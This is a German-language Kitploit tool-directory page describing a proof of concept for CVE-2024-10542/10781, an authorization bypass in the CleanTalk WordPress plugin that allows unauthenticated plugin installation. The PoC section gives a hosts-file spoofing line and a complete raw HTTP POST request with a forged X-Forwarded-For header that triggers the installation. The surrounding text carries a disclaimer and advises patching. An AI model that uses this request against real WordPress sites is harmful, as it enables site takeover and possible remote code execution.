Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-10542 — WordPress Spam protection, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2 ist anfällig für eine nicht authentifizierte Installation beliebiger Plugins. | Kitploit
Tools/GitHubGitHub/ubaydev/cve-2024-10542
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungLernen & Bildung
GitHububaydev/cve-2024-10542

CVE-2024-10542

WordPress Spam protection, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2 ist anfällig für eine nicht authentifizierte Installation beliebiger Plugins.

Repository anzeigen
3vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PoC zu CVE-2024-10542 und CVE-2024-10781 Gebrochene Authentifizierung im Spam-Schutz-, AntiSpam- und FireWall-Plugin von CleanTalk <= 6.43.2

Haftungsausschluss:

Die in diesem Dokument zu CVE-2024-10542 bereitgestellten Informationen dienen ausschließlich Lern- und Bildungszwecken. Wir ermutigen nicht zur Nutzung dieser Informationen für schädliche Zwecke und autorisieren diese auch nicht, einschließlich, aber nicht beschränkt auf Ausnutzung, Systemmanipulation oder andere illegale Aktivitäten.

Einleitung:

In einer zunehmend komplexen digitalen Landschaft ist die Gewährleistung der Sicherheit von Websites für viele Website-Betreiber von größter Bedeutung. Kürzlich wurden zwei kritische Schwachstellen entdeckt, die eine erhebliche Bedrohung für WordPress-Sites darstellen. Diese Schwachstellen betreffen das bekannte CleanTalk-Plugin, das Spam-Schutz, Anti-Spam-Maßnahmen und eine Firewall bietet. Was macht diese Situation noch dringlicher? Lass uns tiefer eintauchen! Zwei Schwachstellen, die als CVE-2024-10542 und CVE-2024-10781 erfasst sind, könnten nicht authentifizierten Angreifern ermöglichen, schädliche Plugins auf anfälligen Sites zu installieren und zu aktivieren. Dies gefährdet nicht nur den Ruf der Site, sondern öffnet Angreifern auch die Tür zur Ausführung von Remote-Code. Mit einem CVSS-Score von 9,8 von 10 ist offensichtlich, dass diese Schwachstellen in die Kategorie „extrem gefährlich“ fallen. Laut Wordfence betreffen beide Schwachstellen ein Problem mit der Umgehung der Autorisierung, das es einem böswilligen Akteur ermöglichen könnte, beliebige Plugins zu installieren und zu aktivieren. Dies könnte dann den Weg für die Ausführung von Remote-Code ebnen, wenn das aktivierte Plugin selbst anfällig ist.

PoC:

Zunächst werden böswillige Benutzer ihre Hosts-Datei in ihren Betriebssystemen anpassen:

root@kitploit:~
127.0.0.1 cleantalk.org

Danach senden sie eine Anfrage wie diese:

root@kitploit:~
POST /?plugin=wp-hooks-finder/index.php HTTP/1.1
Host: wordpress.test
Content-Length: 56
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

spbc_remote_call_action=install_plugin&plugin_name=apbct

Fazit:

Cybersicherheit ist eine Verantwortung, die jeder Website-Betreiber teilt. Indem wir Plugins auf dem neuesten Stand halten und wachsam gegenüber potenziellen Schwachstellen bleiben, können wir unsere Sites vor böswilligen Angriffen schützen. Stelle sicher, dass du CleanTalk auf die neueste Version aktualisiert hast, und führe Routineprüfungen anderer Plugins durch, um maximale Sicherheit zu gewährleisten. Denk daran: Kleine Schritte können große Katastrophen verhindern!

Referenzen:

  • https://thehackernews.com/2024/11/critical-wordpress-anti-spam-plugin.html
  • https://patchstack.com/database/vulnerability/cleantalk-spam-protect/wordpress-spam-protection-anti-spam-firewall-by-cleantalk-plugin-6-43-2-authorization-bypass-via-reverse-dns-spoofing-vulnerability
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cleantalk-spam-protect/spam-protection-anti-spam-firewall-by-cleantalk-6432-authorization-bypass-via-reverse-dns-spoofing-to-unauthenticated-arbitrary-plugin-installation
  • https://plugins.trac.wordpress.org/changeset/3179819/cleantalk-spam-protect#file631

Kauf mir einen Kaffee:

  • https://saweria.co/ubaii
  • https://buymeacoffee.com/ubaii
  • https://trakteer.id/ubaii

Danke an:

Allah, Muhammad SAW, mikemyers, Markdown Monster, meine Familie, dich?

Tool herunterladen